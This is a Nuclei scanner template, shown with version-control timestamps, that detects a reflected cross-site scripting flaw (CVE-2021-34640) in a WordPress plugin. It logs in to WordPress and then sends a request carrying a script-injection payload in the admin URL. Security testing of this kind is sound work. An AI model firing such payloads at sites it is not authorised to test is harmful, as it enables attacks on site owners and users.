nuclei-templates/cves/2021/CVE-2021-34640.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

2022-02-04 19:19:25 +00:00
id: CVE-2021-34640
info:
name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDK
severity: medium
2022-02-08 18:29:30 +00:00
description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.
2022-02-04 19:19:25 +00:00
reference:
- https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
2022-02-08 18:29:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-34640
2022-02-04 19:19:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-34640
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 18:29:30 +00:00
GET //wp-admin/options-general.php/"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1
2022-02-04 19:19:25 +00:00
Host: {{Hostname}}
2022-02-08 18:29:30 +00:00
cookie-reuse: true
2022-02-04 19:19:25 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-02-08 18:29:30 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2022-02-04 19:19:25 +00:00
- type: status
status:
- 200
- type: word
2022-02-08 18:29:30 +00:00
part: header
2022-02-04 19:19:25 +00:00
words:
- "text/html"